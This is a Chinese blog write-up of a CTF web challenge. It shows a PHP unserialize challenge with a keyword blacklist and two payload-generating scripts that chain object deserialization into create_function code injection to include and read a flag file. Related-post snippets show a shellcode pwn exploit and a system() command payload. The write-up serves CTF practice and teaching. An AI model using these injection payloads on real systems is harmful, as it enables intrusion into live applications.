[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser

最新推荐文章于 2023-02-09 09:18:27 发布
最新推荐文章于 2023-02-09 09:18:27 发布
阅读量584 收藏 3
点赞数 2
分类专栏: 刷题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120526877
版权

hellounser

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;

    public function show(){
        $func = $this->func;           //匹配a-z,0-9,区分大小写
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) ||   preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) {
            die('No!No!No!');
        } else {
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg);
        }
    }

    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }


}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}

?>

前置

__toString(),类被当成字符串时的回应方法
__invoke(),调用函数的方式调用一个对象时的回应方法

代码审计

最终我们通过B类里的show方法来获得flag,通过A类中var变量来初始化B类,echo调用了__toString从而调用B类中show

分析正则表达式

前面是$func不能是开头到结尾纯数字字母,i是大小写都匹配,s是匹配任何空白符号(空格,制表),D是结尾不是换行符号

这里很好绕过,比如var_dump含有一个_即可绕过。或者开头换行符号都可以

后面是$arg过滤了一大堆东西,都满足就会包含flag.php,但没输出。

同时会把 f u n c 当 作 函 数 名 , 传 入 两 个 参 数 , 一 个 是 空 字 符 串 , 一 个 是 func当作函数名,传入两个参数,一个是空字符串,一个是 funcarg

知识点

create_function()

适用范围:PHP 4> = 4.0.1PHP 5PHP 7

功能:根据传递的参数创建匿名函数,并为其返回唯一名称。

create_function(string $args,string $code)
//string $args 声明的函数变量部分

//string $code 执行的方法代码部分

警告:

这个函数在内部执行eval(),因此具有与eval()相同的安全问题。此外,它还有不好的性能和内存使用特性。

如果你使用的是 PHP 5.3.0 或更高版本,应该使用本地匿名函数来代替。

pop链构造

传入

return(1);}任意代码;//

}会和前面{闭合,后面注释符号会注释后面的{,实现执行任意代码

法一
<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
}

$a = new A();
$b = new B();

$b -> func = 'create_function';
$b -> arg = 'return 1;}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//'; //包含flag文件并输出
$a -> var = $b;

echo serialize($a);

解析

get_defined_vars() 函数返回由所有已定义变量所组成的数组。
法2

由于过滤了很多东西,我们可以考虑取反绕过,再用伪协议来读取文件内容。

但是还有一个问题是取反后的符号大多数不可打印符号,不方便复制get传入,因此要对他进行url编码

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
}

$a = new A();
$b = new B();

$ac=(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php'));
$b -> func = 'create_function';
$b -> arg = 'return 1;}require(~('.strval($ac).'));//'; //包含flag文件并输出
$a -> var = $b;

echo urlencode(serialize($a));

解析

strval() 函数用于获取变量的字符串值。

参考:

https://www.cnblogs.com/aninock/p/15336101.html

http://www.snowywar.top/?p=2592

Snakin_ya
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 837
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 403
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫
09-25 1280
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF Sept X 浙江工业大学秋季挑战赛 hellounser
Tajang的大千世界
02-09 234
我傻逼,当时没做出来,赛后看wp才理解,正则也要复习复习了
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Le1a's Blog
09-26 293
Girlfriend’s account 下载附件,得到一个excel表格,打开得到 flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21} 也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。 excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下 百度知道链
Visual Assist X_10.9.2237.0
10-31
Windows 10 Build 15063.608, issued Sept 12th, broke a hook mechanism. Windows Version 1709 (Fall Creators Update), released Oct 17th, broke also CreateWindow(). Microsoft is actively seeking ...
microtca_short_form_sept_2006
07-20
标题“microtca_short_form_sept_2006”和描述中的信息表明,这是一个关于MicroTCA(微型电信计算联盟)技术的标准文档,发布时间为2006年9月。MicroTCA是一种开放标准,它扩展了原有的AdvancedTCA(ATCA)规范,...
Sept8Exercises
05-10
#csc462UML 2015年9月3日,用于课堂作业的起始代码存储库。 目标是让班级克隆存储库,并通过导入3个班级练习的项目来用作本地蚀工作区进行分析。 删除不需要的软件包。 将JUnit测试添加到edu.elon.test包中的ATM...
MillsAPCS-Sept2015
05-06
这个标题暗示了内容可能专注于AP Computer Science(AP计算机科学),这是一门针对美国高中学生的大学预科课程,主要教授Java编程语言。 【描述】"米尔斯APCS-2015年9月"是对标题的简短补充,进一步确认了这个资料...
fusioneer-2015-sept
05-07
$ cd fusioneer-2015-sept 安装依赖项: $ gem install bundler # if you don't have it $ bundle install 健全性检查设置 要验证所有设置是否正确,请运行以下命令: $ ruby sanity_test.rb 您应该看到以下输出...
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 245
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem
yongbaoii的博客
09-27 324
开了沙箱。 看到两个特征数的时候显然知道是md5了,密码需要md5.
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1636
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
python xlrd对excel文件的读取
xu19950525的博客
10-09 543
XLRD库主要是对文件进行读取,写文件一般用xlwt库,该库遵循 ”读取修改覆盖“ 的原则。 import xlrd # 打开文件 workbook = xlrd.open_workbook('C:/Users/Administrator/Desktop/s4.xlsx') sheet2_name = workbook.sheet_names() # 获取所有sheet名称 prin...
DASCTF Sept X 浙江工业大学秋季挑战赛 writeup
09-26 2668
crypto-welcome 签到 已知n、m、c 求e,sage脚本 m = 73964803637492582853353338913523546944627084372081477892312545091623069227301 c = 21572244511100216966799370397791432119463715616349800194229377843045443048821 n = 2 ** 256 e=discrete_log(c,mod(m,n)) print(e) #348528
[BJDCTF2020]EzPHP&DASCTF-sep:hellounser
weixin_47813861的博客
10-03 547
EzPHP 查看源码,然后base32解密一下进入对应文件。 无语的是环境应该是出了问题,一上来就报“fxck”,导致那串代码根本没法绕过。最后破案了,需要把cookie清理一下。 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<b
hellounser—web反序列化
总有妖怪想害朕
09-30 182
hellounser 难度系数:3 题目描述:无 解题工具:火狐浏览器、php、sublime、在线base64加密(https://www.qqxiuzi.cn/bianma/base64.htm) 解题思路:打开场景,是一串php脚本代码,审计代码,设计到反序列化知识和魔法函数,通过preg_match()函数过滤了参数,构造payload,具体如下步骤,导入到php中,构造pop链, pop=O:1:“A”:1:{s:3:“var”;O:1:“B”:2:{s:4:“func”;s:15:“create
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 2837
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
【CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 639
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
2022dasctf x su 三月春季挑战赛
最新发布
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战和乐趣的比赛。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值